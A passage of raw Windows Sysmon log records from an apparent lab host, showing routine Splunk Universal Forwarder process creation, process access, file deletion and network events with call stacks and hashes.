Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:43.573{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:43.573{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:43.573{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4E9B-613A-4790-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E9B-613A-4790-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.558{B81B27B7-4E9B-613A-4790-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035084812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E9C-613A-4990-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4E9C-613A-4990-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:44.840{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:44.840{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.840{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E9C-613A-4990-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.835{B81B27B7-4E9C-613A-4990-03000000C801}7004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
23542300x800000000000000035084804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.839{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03ED58B24EFCFD8684C8143E306BBAEE,SHA256=E9EFA9246D7D6EE34ED5102B25BE3C7249AA4CB0867CE7AB2259DD71E786547D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FDB786973BA99A20DEBDAE9C611806F,SHA256=09A2B51C527A2C2A3746475B274215D85C8BC16F39C81D6E0E388FCAB71A7EF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C50C4CEAADFE6D1ECB0D4B4430D750B,SHA256=1D0EC171A1117731FCC73A665EFFB9D6A4906E06C0C5A8537E82382F134F7EAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.419{B81B27B7-4E9C-613A-4890-03000000C801}24001224C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035084800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:08.125{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56652-false10.0.1.12-8000- 10341000x800000000000000035084799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E9C-613A-4890-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:44.241{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:44.241{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:44.241{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E9C-613A-4890-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.241{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E9C-613A-4890-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:44.236{B81B27B7-4E9C-613A-4890-03000000C801}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:45.855{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=381158029610BE3473977898CD735E9C,SHA256=F549BA14619719AB29558F483502BD346BAA29ABAC3D7C45E9F61667BCF14B9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:45.838{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3FDB786973BA99A20DEBDAE9C611806F,SHA256=09A2B51C527A2C2A3746475B274215D85C8BC16F39C81D6E0E388FCAB71A7EF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:46.873{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
